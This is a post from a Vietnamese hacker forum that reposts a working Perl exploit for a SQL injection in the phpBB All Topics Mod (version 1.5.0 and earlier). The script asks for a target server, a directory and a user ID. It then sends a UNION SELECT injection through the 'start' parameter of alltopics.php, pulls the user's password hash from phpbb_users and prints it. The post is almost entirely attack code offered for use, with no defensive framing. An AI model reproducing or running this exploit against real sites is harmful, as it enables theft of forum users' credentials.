banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits phpBB All Topics Mod (- 1.5.0 (start) Remote SQL Inj Exploit  XML
  [Question]   phpBB All Topics Mod (- 1.5.0 (start) Remote SQL Inj Exploit 24/08/2006 23:34:37 (+0700) | #1 | 17655
[Avatar]
DaoDuyHieu
HVA Friend

Joined: 14/04/2004 00:32:37
Messages: 200
Location: MICROSOFT
Offline
[Profile] [PM] [Email] [Yahoo!] [MSN]
phpBB All Topics Mod <= 1.5.0 (start) Remote SQL Injection Exploit

_http://www.milw0rm.com/exploits/2248

Code:
#!/usr/bin/perl

print q{
++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                                    +
+ phpBB 2.0.21 (alltopics.php) SQL Injection Exploit +
+                                                    +
+                  bd0rk || SOH-Crew                 +
+                                                    +
+    Mod: http://www.phpbbhacks.com/download/2821    +
+                                                    +
++++++++++++++++++++++++++++++++++++++++++++++++++++++

};

use IO::Socket;

print q{
=> Insert URL
=> without ( http )
=> };
$server = <STDIN>;
chop ($server);
print q{
=> Insert directory
=> es: /forum/ - /phpBB2/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "alltopics.php?mode=&order=ASC&start=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_ users%20where%20user_id=".$user ;
print "
=> Exploit in process...\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";
print "Exploit\r\n";
print "in process...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "Exploit finished!\r\n\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "MD5-Hash is: ".$1."\r\n";
}
exit();
}
}
Great hopes make great men smilie
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|